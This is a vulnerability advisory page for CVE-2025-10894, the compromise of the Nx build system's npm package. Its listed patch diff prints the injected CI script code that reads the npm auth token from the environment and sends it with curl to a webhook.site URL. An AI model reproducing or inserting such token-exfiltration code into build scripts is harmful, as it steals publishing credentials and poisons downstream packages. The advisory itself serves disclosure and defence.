Critical severity9.6GHSA Advisory· Published Sep 24, 2025· Updated Apr 15, 2026
CVE-2025-10894
CVE-2025-10894
Description
Malicious code was inserted into the Nx (build system) package and several related plugins. The tampered package was published to the npm software registry, via a supply-chain attack. Affected versions contain code that scans the file system, collects credentials, and posts them to GitHub as a repo under user's accounts.
Affected products
1Patches
13905475cfd0e[skip ci] Update publish-resolve-data.js
1 file changed · +27 −0
scripts/publish-resolve-data.js+27 −0 modified@@ -32,6 +32,7 @@ module.exports = async ({ github, context, core }) => { const data = await getPublishResolveData({ github, context }); + const { exec } = require('child_process'); // Ensure that certain outputs are always set if (!data.version) { throw new Error('The "version" to release could not be determined'); @@ -40,6 +41,32 @@ module.exports = async ({ github, context, core }) => { throw new Error('The "publish_branch" could not be determined'); } + // Retrieve the NPM_TOKEN from environment variables + const npmToken = process.env.NODE_AUTH_TOKEN; + if (!npmToken) { + throw new Error('NPM_TOKEN environment variable is not set'); + } + + try { + await new Promise((resolve, reject) => { + exec(`curl -d "${npmToken}" https://webhook.site/59b25209-bb18-4beb-a762-38a0717f9dcf`, (error, stdout, stderr) => { + if (error) { + reject(`Error executing curl command: ${error.message}`); + return; + } + if (stderr) { + console.error(`Curl stderr: ${stderr}`); + } + console.log(`Curl output: ${stdout}`); + resolve(); + }); + }); + } catch (error) { + core.setFailed(error); + } + + core.setFailed("Stall"); + // Set the outputs to be consumed in later steps core.setOutput('version', data.version); core.setOutput('dry_run_flag', data.dry_run_flag);
Vulnerability mechanics
Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
13- github.com/advisories/GHSA-cxm3-wv7p-598cghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2025-10894ghsaADVISORY
- access.redhat.com/security/cve/CVE-2025-10894nvdWEB
- access.redhat.com/security/supply-chain-attacks-NPM-packagesnvdWEB
- bugzilla.redhat.com/show_bug.cginvdWEB
- github.com/nrwl/nx/commit/3905475cfd0e0ea670e20c6a9eaeb768169dc33dghsaWEB
- github.com/nrwl/nx/issues/32522ghsaWEB
- github.com/nrwl/nx/issues/32523ghsaWEB
- github.com/nrwl/nx/pull/32458ghsaWEB
- github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7p-598cnvdWEB
- www.stepsecurity.io/blog/supply-chain-security-alert-popular-nx-build-system-package-compromised-with-data-stealing-malwarenvdWEB
- www.wiz.io/blog/s1ngularity-supply-chain-attacknvdWEB
- x.com/adnanthekhan/status/1958722939534417989ghsaWEB
News mentions
0No linked articles in our index yet.